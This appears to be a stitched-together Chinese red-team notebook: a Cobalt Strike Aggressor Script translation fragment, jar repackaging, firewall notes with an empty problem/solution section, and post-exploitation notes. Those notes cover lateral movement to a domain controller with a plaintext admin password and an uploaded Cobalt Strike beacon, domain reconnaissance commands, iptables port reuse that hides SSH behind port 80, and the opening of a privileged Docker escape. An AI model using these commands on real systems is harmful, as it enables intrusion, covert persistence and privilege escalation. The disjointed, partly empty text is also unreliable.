[toc]

Aggressor Script官方文档翻译-2.Cobalt Strike

Cobalt Strike 客户端

Aggressor 脚本引擎是Cobalt Strike的集成特性(the glue feature). 大多数Cobalt Strike对话框和特性都是作为向Aggressor 脚本引擎公开某些接口的独立模块编写的。

Cobalt Strike中内置了一个默认的脚本, default.cna, 这个脚本定义了Cobalt Strike的工具栏按钮，弹出式菜单，它还为大多数Cobalt Strike事件格式化输出。

本章将向您展示这些功能如何工作，并使您能够按照您的需求来塑造Cobalt Strike客户端。

快捷键

脚本可以创建快捷键，使用bind关键字绑定快捷键。这个例子展示了当Ctrl和H同时按下时，在对话框中显示“**Hello World!**”。

1
2
3

bind Ctrl+H {
	show_message("Hello World!");
}

Jar反编译和重打包

使用jadx反编译

1

./jadx -d win win.jar

使用javac编译工程

1

javac -encoding utf8 -cp classes -d classes ./src/com/jlcss/ep/*.java -classpath ./lib/swt.jar

重新打包

将jar解压，替换classes后重新打包成zip文件，最后将后缀改成jar即可

问题描述：

解决办法：

因为Ubuntu默认使用的防火墙并不是iptables，所以使用iptables之前需要先禁用UFW。

命令如下：

1

sudo ufw disable

类似地，在CentOS 7服务器的情况下，防火墙也可能是冲突的一个原因。FirewallD默认包含在CentOS 7中。

1

service iptables save

有时，在Ubuntu服务器中执行以下命令会返回一个无法识别的服务消息。

该命令基于/etc/init.d文件夹中iptables的启动脚本起作用。 通常，此命令适用于RHEL / Red Hat / CentOS。 在Ubuntu中，要保存防火墙规则的更改，我们使用以下命令

横向移动

对 DC(10.10.10.2)目标主机建立共享连接，并查看目标主机共享资源。

1
2

shell net use \\10.10.10.2 /user:administrator "JDredteam666"
shell net view \\10.10.10.2

列出目标主机 C 盘下目录文件。

1

shell dir \\10.10.10.2\C$

将CS木马上传到跳板机。

1

upload C:\Users\asus\Desktop\beacon.exe (C:\Users\Server\Desktop\beacon.exe)

将server(192.168.111.3)跳板机的木马文件copy到DC(10.10.10.2)目标机的C共享盘下。

域操作基础命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

net group /domain                 获得所有域用户组列表
net group xxxxx /domain              显示域中xxxxx组的成员
net group xxxxx /del /domain           删除域中xxxxx组
net group xxxxx xy /del /domain          删除域内xxxxx 群组中的xy成员
net group xxxxx /add /domain           增加域中的群组
net group "domain admins" /domain         获得域管理员列表
net group "enterprise admins" /domain       获得企业管理员列表
net localgroup administrators /domain       获取域内置administrators组用（enterprise admins、domain admins）
net group "domain controllers" /domain      获得域控制器列表
net group "domain computers" /domain       获得所有域成员计算机列表
net user /domain                 获得所有域用户列表
net user xxxx /domain               获得指定账户xxxx的详细信息
net accounts /domain               获得域密码策略设置，密码长短，错误锁定等信息
net view /domain                 查询有几个域, 查询域列表
net view /domain:xxxx               查看 xxxx域中的计算机列表
nltest /domain_trusts               获取域信任信息
net user domain-admin /domain           查看管理员登陆时间，密码过期时间，是否有登陆脚本，组分配等信息
net config Workstation              查询机器属于哪个域
net time /domian                 查询主域服务器的时间
echo %logonserver%                查看登陆到这台服务器的计算机名
gpupdate/force                  更新域策略
tasklist /S ip /U domain\username /P /V      查看远程计算机进程

Linux利用iptables做端口复用

方案一：(根据源地址做端口复用)

以下这条命令的作用是将来自192.168.10.13的访问80端口的流量都重定向到22端口。

1

iptables -t nat -A PREROUTING -p tcp -s 192.168.10.13 --dport 80 -j REDIRECT --to-port 22

但是这样做有一个问题就是，我们访问目标主机80端口的流量都会被转给22端口。如果我们不用访问该HTTP服务的话，这是一个好的办法。实战中，我们一般是用VPS连接不用访问HTTP服务，所以在实战中该方法用的比较多。

方案二：(根据源地址源端口做端口复用)

以下的命令是根据源地址源端口做端口复用，也就是只有来自192.168.10.13主机的33333端口的访问80端口的流量会被转给22端口.

1

iptables -t nat -A PREROUTING -p tcp -s 192.168.10.13 --sport 33333 --dport 80 -j REDIRECT --to-port 22

然后我们本机先用socat将本地44444端口的流量以源端口33333访问192.168.10.129的80，然后我们SSH本地的44444端口即可。

1
2

nohup socat tcp-listen:44444,fork,reuseaddr tcp:192.168.10.129:80,sourceport=33333,reuseaddr &
ssh -p 44444 root@127.0.0.1

使用特权模式启动容器的docker逃逸方法

使用特权模式启动镜像

1

docker run -it --privileged 2c047404e52d /bin/bash

考虑到部署环境时大多使用vulhub的镜像，所以这里给出修正方案是在docker-compose.yml文件中添加一个字段，如下：

1

privileged: true

修改完成后执行如下命令启动：

1

docker-compose up -d

通过漏洞利用拿到docker 容器的shell后：

查看磁盘文件：fdisk -l